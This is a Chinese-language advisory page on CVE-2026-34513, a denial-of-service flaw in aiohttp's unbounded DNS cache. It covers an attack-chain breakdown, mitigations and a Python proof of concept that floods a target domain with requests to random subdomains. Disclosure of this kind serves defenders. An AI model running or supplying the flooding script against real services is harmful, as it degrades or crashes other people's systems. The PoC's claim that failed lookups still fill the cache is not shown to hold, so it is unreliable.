CVE-2026-34513 CVSS 7.5 高危

CVE-2026-34513 AIOHTTP无界DNS缓存致拒绝服务漏洞

披露日期: 2026-04-01

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-34513

漏洞类型

拒绝服务

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

aiohttp

漏洞概述

aiohttp是Python中流行的异步HTTP客户端/服务端框架。在3.13.4版本之前，其DNS缓存机制存在缺陷，未对缓存大小进行限制。攻击者可利用此漏洞诱导程序向大量唯一域名发起请求，导致内存占用激增，最终引发拒绝服务。该漏洞已在3.13.4版本中得到修复。

技术细节

该漏洞的根源在于aiohttp框架内部的DNS解析器实现中缺少对缓存条目数量的上限控制。在受影响的版本中，每当框架解析一个新的主机名时，其对应的IP地址记录都会被永久添加到内存缓存中，且缺乏自动清理或最大容量限制机制。攻击者可以通过诱导受害服务器向大量不重复的域名发起请求来利用此漏洞。这种诱导可以通过HTTP请求走私、发送包含大量不同Host头的请求、或者利用重定向机制指向随机子域名来实现。随着恶意请求的增加，DNS缓存持续膨胀，导致服务器内存资源被耗尽，最终触发OOM（Out of Memory）错误终止进程或导致服务严重卡顿，从而达成拒绝服务攻击的目的。此漏洞利用无需用户交互且无需认证，攻击成本较低。

攻击链分析

STEP 1

侦察

攻击者识别目标应用程序是否使用了受影响版本的aiohttp库（<3.13.4）作为HTTP客户端。

STEP 2

资源准备

攻击者准备大量随机生成的唯一域名列表或拥有权威DNS解析能力的恶意域名服务器。

STEP 3

漏洞利用

攻击者通过SSRF、API调用或诱导用户点击等方式，触发目标应用程序向这些海量唯一域名发起HTTP连接请求。

STEP 4

缓存膨胀

aiohttp的DNS解析器将每个新域名的解析结果无限制地存入内存缓存，导致内存占用率持续上升。

STEP 5

拒绝服务

当系统内存耗尽时，应用程序崩溃或被系统OOM Killer终止，导致服务不可用。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import asyncio
import aiohttp
import random
import string

def generate_random_subdomain(length=8):
    """Generate a random subdomain to simulate unique DNS lookups"""
    return ''.join(random.choices(string.ascii_lowercase, k=length))

async def trigger_unbounded_cache(base_url):
    """
    This PoC simulates an attack by sending requests to unique subdomains.
    In a vulnerable version of aiohttp (<3.13.4), this will fill the DNS cache.
    """
    async with aiohttp.ClientSession() as session:
        tasks = []
        for i in range(10000):
            # Construct a URL with a unique subdomain
            subdomain = generate_random_subdomain()
            target_url = f"http://{subdomain}.{base_url}"
            
            # Fire off requests. Note: These will likely fail DNS resolution,
            # but the cache entry is created during the lookup attempt.
            tasks.append(session.get(target_url))
        
        # Execute requests
        responses = await asyncio.gather(*tasks, return_exceptions=True)
        print(f"Sent {len(responses)} requests. Check memory usage.")

if __name__ == "__main__":
    # Replace with a target domain or use a dummy one if testing local resolver behavior
    target_domain = "example.com"
    print(f"Starting PoC for CVE-2026-34513 against {target_domain}...")
    asyncio.run(trigger_unbounded_cache(target_domain))

影响范围

aiohttp < 3.13.4

防御指南

临时缓解措施

如果暂时无法升级版本，建议在网络层面限制出站DNS请求的频率，或在应用层面对目标域名进行白名单校验。此外，可以使用容器（如Docker）限制进程的内存上限，防止单个进程耗尽宿主机全部资源。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表